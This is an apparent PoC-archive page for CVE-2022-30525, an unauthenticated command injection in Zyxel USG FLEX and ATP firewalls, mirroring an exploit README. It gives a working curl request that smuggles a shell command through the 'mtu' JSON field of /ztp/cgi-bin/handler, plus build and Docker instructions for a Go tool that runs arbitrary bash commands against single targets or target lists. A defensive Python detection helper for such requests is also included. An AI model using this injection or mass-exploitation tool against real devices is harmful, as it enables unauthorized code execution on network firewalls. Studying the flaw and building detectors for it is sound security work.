Associated vulnerability
Title:
Zyxel USG FLEX operating system command injection vulnerability
(CVE-2022-30525)
Description: Zyxel USG FLEX is a firewall from the Chinese company Zyxel (合勤科技). It offers flexible VPN options (IPsec, SSL or L2TP), providing flexible and secure remote access for remote work and administration. Zyxel USG FLEX versions 5.00 through 5.21 contain a security vulnerability. An attacker who exploits it can modify a specific file and execute operating system commands on the vulnerable device.
Description
Initial POC for the CVE-2022-30525
Introduction
# CVE-2022-30525 by 1vere$k
**Rapid7** discovered and reported a vulnerability that affects Zyxel firewalls supporting Zero Touch Provisioning (ZTP), which includes the ATP series, VPN series, and the USG FLEX series (including USG20-VPN and USG20W-VPN). The vulnerability, identified as CVE-2022-30525, allows an unauthenticated and remote attacker to achieve arbitrary code execution as the nobody user on the affected device.
The following table contains the affected models and firmware versions.

| Affected Model | Affected Firmware Version |
|---|---|
| USG FLEX 100, 100W, 200, 500, 700 | ZLD5.00 thru ZLD5.21 Patch 1 |
| USG20-VPN, USG20W-VPN | ZLD5.10 thru ZLD5.21 Patch 1 |
| ATP 100, 200, 500, 700, 800 | ZLD5.10 thru ZLD5.21 Patch 1 |
The VPN series, which also supports ZTP, is not vulnerable because it does not support the required functionality.
The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the `nobody` user. This vulnerability is exploited through the `/ztp/cgi-bin/handler` URI.
## Curl Example
```
curl -v --insecure -X POST -H "Content-Type: application/json" \
  -d '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}' \
  https://192.168.1.1/ztp/cgi-bin/handler
```
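The request above shows what a defender needs to recognise: a JSON body posted to `/ztp/cgi-bin/handler` whose `mtu` field, which should only ever hold a number, carries a shell command. The following Python helper is an added example for detection and is not part of the PoC or of Zyxel's code. It takes a request path and body (for instance from a reverse-proxy or WAF log) and flags non-numeric values in the numeric `setWanPortSt` fields and shell metacharacters in any string field. The field names come from the curl example on this page; the set of fields treated as numeric is an assumption based on their names, and the sample requests are constructed for illustration.

```python
"""Detection helper for CVE-2022-30525-style requests to the Zyxel ZTP handler.

Added example, not part of the original PoC or of Zyxel's code. Field names
(command, proto, port, vlan_tagged, vlanid, mtu, data) are taken from the
curl example on the page; the sample requests below are constructed.
"""
import json
import re

ZTP_HANDLER_PATH = "/ztp/cgi-bin/handler"

# Fields of setWanPortSt that should only hold small integers. This is an
# assumption based on the parameter names; the vendor schema is not on the page.
NUMERIC_FIELDS = {"port", "vlan_tagged", "vlanid", "mtu"}

# Characters that would let a value break out into a shell; none of them
# belong in a network setting value.
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")


def inspect_body(path: str, body: str) -> list:
    """Return a list of (field, reason) findings for one HTTP request.

    An empty list means nothing suspicious was seen. Requests to other paths
    are ignored so the check can run over a whole access log.
    """
    findings = []
    if path != ZTP_HANDLER_PATH:
        return findings
    try:
        data = json.loads(body)
    except (ValueError, TypeError):
        return [("body", "non-JSON body sent to ZTP handler")]
    if not isinstance(data, dict):
        return [("body", "JSON body is not an object")]
    for key, value in data.items():
        if not isinstance(value, str):
            continue
        if key in NUMERIC_FIELDS and not value.isdigit():
            findings.append((key, f"non-numeric value in numeric field: {value!r}"))
        elif SHELL_META.search(value):
            findings.append((key, f"shell metacharacter in value: {value!r}"))
    return findings


# Constructed sample requests: a benign ZTP call, the injection pattern shown
# on this page, a malformed body, and a request to an unrelated path.
SAMPLE_REQUESTS = [
    (ZTP_HANDLER_PATH, '{"command":"setWanPortSt","proto":"dhcp","port":"4",'
                       '"vlan_tagged":"1","vlanid":"5","mtu":"1500","data":"hi"}'),
    (ZTP_HANDLER_PATH, '{"command":"setWanPortSt","proto":"dhcp","port":"4",'
                       '"vlan_tagged":"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'),
    (ZTP_HANDLER_PATH, 'not json at all'),
    ("/cgi-bin/other", '{"mtu":"; id"}'),
]


def scan(requests):
    """Return (index, findings) for every request that produced a finding."""
    results = []
    for i, (path, body) in enumerate(requests):
        findings = inspect_body(path, body)
        if findings:
            results.append((i, findings))
    return results


if __name__ == "__main__":
    for i, findings in scan(SAMPLE_REQUESTS):
        for field, reason in findings:
            print(f"request {i}: {field}: {reason}")
```

The check is deliberately strict on the numeric fields rather than trying to enumerate dangerous strings: a value that is not a plain integer in `mtu` or `vlanid` is already enough to alert on, whatever follows it. Vendor patches for the affected firmware remain the actual fix; this only helps spot attempts in traffic you already log.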
## Usage
A `cmds` file must exist in which you add the commands to be executed by the program, in the following format:
```
bash -c "command#1 && command#2 && etc."
```
For example:
```
bash -c "ping 8.8.8.8"
```
**Golang**
```
git clone https://github.com/iveresk/cve-2022-30525.git
cd cve-2022-30525
go build -o cve-2022-30525 cve-2022-30525.go
chmod +x cve-2022-30525
./cve-2022-30525 -t <targetURL> [or <targetFile>]
```
**Dockerfile**
```
docker run -it -e INPUT_FILE=<file_name> masterrooot/cve-30525
```
Here `INPUT_FILE` is either a target URL or a file containing a list of targets.
## Contact
You are free to contact me via [Keybase](https://keybase.io/1veresk) for any details.
File snapshot
[4.0K] /data/pocs/78a571a986044dadb6dea6d1d06a47199277f2b8
├── [2.0K] cve-2022-30525.go
├── [ 499] Dockerfile
├── [4.0K] exploit
│ └── [1.9K] exploit.go
├── [ 30] go.mod
├── [1.0K] LICENSE
└── [2.0K] README.md
1 directory, 6 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.